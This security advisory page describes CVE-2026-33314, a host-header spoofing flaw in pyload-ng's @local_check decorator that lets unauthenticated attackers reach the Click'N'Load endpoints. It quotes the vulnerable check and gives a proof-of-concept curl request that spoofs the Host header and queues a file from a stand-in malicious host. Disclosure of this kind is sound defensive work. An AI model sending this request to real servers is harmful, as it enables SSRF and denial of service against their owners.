Launch Week Day 1: Announcing Security Design Review
Start for Free
MEDIUM 6.5 PyPI

Improper Authentication and Origin Validation Error in pyload-ng

GHSA-q485-cg9q-xq2r · CVE-2026-33314 · PYSEC-2026-122

Published · Modified

Description

Summary

A Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).

Details

The pyload WebUI provides an API for the Click'N'Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to localhost:9666). To enforce this, the pyload application uses a @local_check decorator on the relevant routes in src/pyload/webui/app/blueprints/cnl_blueprint.py.

However, the @local_check implementation relies on the user-controlled HTTP_HOST (derived from the HTTP Host header) to verify the origin:

# src/pyload/webui/app/blueprints/cnl_blueprint.py
def local_check(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
        http_host = flask.request.environ.get("HTTP_HOST", "0")

        if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
                "127.0.0.1:9666",
                "[::1]:9666",
        ):
            return func(*args, **kwargs)
        else:
            return "Forbidden", 403
    return wrapper

Because http_host is read directly from the Host header of the HTTP request, an external attacker can easily spoof this header (e.g., Host: 127.0.0.1:9666). When this spoofed header is present, the condition http_host in ("127.0.0.1:9666", ...) evaluates to True, completely bypassing the IP address check (remote_addr) and granting access to the protected functions.

The affected routes are:

  • /flash/ and /flash/<id>
  • /flash/add
  • /flash/addcrypted
  • /flash/addcrypted2
  • /flashgot and /flashgot_pyload
  • /flash/checkSupportForUrl

PoC

  1. Ensure the PyLoad instance is running and accessible externally.
  2. Ensure the ClickNLoad plugin is enabled in the PyLoad settings (it evaluates to disabled by default).
  3. Send a POST request to one of the protected endpoints, such as /flash/add, and spoof the Host header to 127.0.0.1:9666.

Example curl command:

curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \
     -H "Host: 127.0.0.1:9666" \
     -d "urls=http://malicious.com/payload.bin" \
     -d "package=MaliciousPackage"
  1. Notice that you receive a success\r\n response instead of a 403 Forbidden. The package and URL will be successfully added to the PyLoad queue.

Impact

This vulnerability allows unauthenticated attackers to interact with the Click'N'Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server's storage or bandwidth by queueing massive files (DoS).

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes